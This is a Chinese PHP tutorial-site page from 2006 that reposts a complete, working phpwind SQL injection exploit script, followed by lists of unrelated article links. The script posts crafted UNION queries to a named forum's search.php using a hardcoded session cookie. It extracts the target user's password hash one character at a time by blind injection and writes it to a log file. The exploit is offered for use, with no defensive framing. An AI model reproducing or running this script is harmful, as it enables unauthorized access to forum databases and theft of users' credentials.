从网上搜到的phpwind 0day的代码


Posted in PHP onDecember 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";
$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}
fclose($log);
echo "<br>Done!We Post $count times!<br>";

function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

PHP 相关文章推荐
mysq GBKl乱码
Nov 28 PHP
怎样才能成为PHP高手?学会“懒惰”的编程
Dec 05 PHP
php5编程中的异常处理详细方法介绍
Jul 29 PHP
php 正则表达式小结
Aug 31 PHP
PHP分页函数代码(简单实用型)
Dec 02 PHP
将php数组输出html表格的方法
Feb 24 PHP
Laravel框架中扩展函数、扩展自定义类的方法
Sep 04 PHP
php中file_exists函数使用详解
May 08 PHP
php发送html格式文本邮件的方法
Jun 10 PHP
php微信公众号开发之现金红包
Apr 16 PHP
PHP设计模式入门之迭代器模式原理与实现方法分析
Apr 26 PHP
如何运行/调试你的PHP代码
Oct 23 PHP
ajax缓存问题解决途径
Dec 06 #PHP
数字转英文
Dec 06 #PHP
?生?D片??C字串
Dec 06 #PHP
?算你??的 PHP 程式大小
Dec 06 #PHP
PHP中,文件上传
Dec 06 #PHP
eWebEditor v3.8 商业完整版 (PHP)
Dec 06 #PHP
实现 win2003 下 mysql 数据库每天自动备份
Dec 06 #PHP
You might like
php中获取主机名、协议及IP地址的方法
2014/11/18 PHP
phpMyAdmin安装并配置允许空密码登录
2015/07/04 PHP
NodeJS中利用Promise来封装异步函数
2015/02/25 NodeJs
详解Javascript ES6中的箭头函数(Arrow Functions)
2016/08/24 Javascript
vuejs2.0实现一个简单的分页示例
2017/02/22 Javascript
深入理解Vuex 模块化(module)
2017/09/26 Javascript
详解VUE 数组更新
2017/12/16 Javascript
Vue实现侧边菜单栏手风琴效果实例代码
2018/05/31 Javascript
javascript数据结构之多叉树经典操作示例【创建、添加、遍历、移除等】
2018/08/01 Javascript
layui点击按钮添加可编辑的一行方法
2018/08/15 Javascript
原生js检测页面加载完毕的实例
2018/09/11 Javascript
vue中使用axios post上传头像/图片并实时显示到页面的方法
2018/09/27 Javascript
[01:12]DOTA2 2015年秋季互动指南
2015/11/10 DOTA
Python os模块中的isfile()和isdir()函数均返回false问题解决方法
2015/02/04 Python
python从sqlite读取并显示数据的方法
2015/05/08 Python
Python标准库之Sys模块使用详解
2015/05/23 Python
Python openpyxl 遍历所有sheet 查找特定字符串的方法
2018/12/10 Python
python找出一个列表中相同元素的多个索引实例
2019/06/11 Python
使用PyTorch实现MNIST手写体识别代码
2020/01/18 Python
Python BeautifulReport可视化报告代码实例
2020/04/13 Python
浅谈django 重载str 方法
2020/05/19 Python
python+excel接口自动化获取token并作为请求参数进行传参操作
2020/11/10 Python
matplotlib之属性组合包(cycler)的使用
2021/02/24 Python
CSS3中Animation属性的使用详解
2015/08/06 HTML / CSS
HTML5本地存储localStorage、sessionStorage基本用法、遍历操作、异常处理等
2014/05/08 HTML / CSS
维氏瑞士军刀英国网站:Victorinox英国
2019/07/04 全球购物
建筑设计所实习生自我鉴定
2013/09/25 职场文书
家庭教育先进个人事迹材料
2014/01/24 职场文书
求职简历的自我评价
2014/01/31 职场文书
2014年入党积极分子党课学习心得体会模板
2014/04/03 职场文书
南京市纪委监察局整改方案
2014/09/16 职场文书
2014镇党委班子对照检查材料思想汇报
2014/09/23 职场文书
医院护士党的群众路线教育实践活动对照检查材料思想汇报
2014/10/04 职场文书
代办社保委托书范文
2014/10/06 职场文书
个人廉政承诺书
2015/04/28 职场文书
创业计划书之废品回收
2019/09/26 职场文书